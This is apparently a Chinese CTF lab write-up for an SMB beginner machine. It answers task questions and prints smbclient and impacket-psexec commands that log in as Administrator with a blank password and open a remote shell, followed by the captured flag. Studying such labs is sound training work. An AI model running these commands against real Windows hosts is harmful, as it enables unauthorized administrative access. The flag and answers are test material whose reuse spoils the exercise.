一、当我们的 ping ICMP 数据包被 Windows 防火墙阻止时,我们可以使用哪个 Nmap 参数来枚举机器?
1
-PN
二、3 个字母的首字母缩略词 SMB 代表什么?
1
server message block
三、SMB 使用哪个端口进行操作?
1
445
四、你给“smbclient”什么命令行参数来列出可用的共享?
1
-L
五、共享名称末尾的哪个字符表示它是管理共享?
1
$
六、访问哪个管理共享允许用户查看整个文件系统?
1
2
3
#使用smbclient连接
smbclient -IL IP --user=Administrator
c$

image-20230315171412294

七、我们可以使用什么命令来下载我们在 SMB 共享上找到的文件?
1
get
八、Impacket 集合中的哪个工具可用于获取系统上的交互式 shell?
1
psexec.py
九、提交flag
1
2
3
4
5
#使用smbclient或者impacket-psexec连接靶机
smbclient //IP -U Administrator
impacket-psexec "./Administrator:"@IP
#flag文件在C:\Users\Administrator\Desktop\
f751c19eda8f61ce81827e6930a1f40c

image-20230316102048729

总结
  • SMB弱密码

  • smbclient工具使用

    1
    smbclient //IP -U username
  • impacket-psexec工具使用

    1
    impacket-psexec "./username:"@IP